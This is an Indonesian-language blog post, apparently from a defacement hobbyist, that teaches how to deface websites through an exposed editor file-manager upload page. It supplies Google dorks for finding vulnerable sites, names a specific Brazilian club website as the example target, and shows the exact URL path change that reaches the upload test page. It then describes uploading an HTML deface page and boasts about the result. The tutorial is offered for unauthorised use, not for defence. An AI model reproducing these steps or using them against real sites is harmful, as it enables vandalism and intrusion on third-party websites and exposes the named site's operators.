XRWRR: Remote File Upload Exploit Vulnerability

Remote File Upload Exploit Vulnerability

1) Cari website target
Dork : inurl:/editor/editor/filemanager/
inurl:/HTMLEditor/editor/"
Pilih satu website yang kalian inginkan
Untuk tutor ini saya memilih website "http://www.atleticoceilandense.com.br/"

2) Buka websitenya

contoh : http://www.atleticoceilandense.com.br/editor/editor/filemanager/browser/mcpuk/

Maka akan muncul tampilan seperti ini

Ganti bagian :

/editor/editor/filemanager/browser/mcpuk/

Dengan :

/editor/editor/filemanager/upload/test.html

Maka url nya skrg :

http://www.atleticoceilandense.com.br/editor/editor/filemanager/upload/test.html

3) Dibawah ini tampilan setelah kalian membuka url yang sudah diberi exploit

4) Untuk step keempat kalian lihat gambar dibawah ini ^_^

5) Dibawah ini adalah tampilan setelah html deface kalian sudah selesai diupload

6) Ini penampakan deface ane haha

[ PLAYGROUND ]
Indonesian Coder || Codenesia || Exploit Database || Exploit ID || HN Community || devilzc0de || Packet Storm || cxsecurity

Remote File Upload Exploit Vulnerability

Leave a Reply

Entri Populer

Labels

Followers

Blog Archive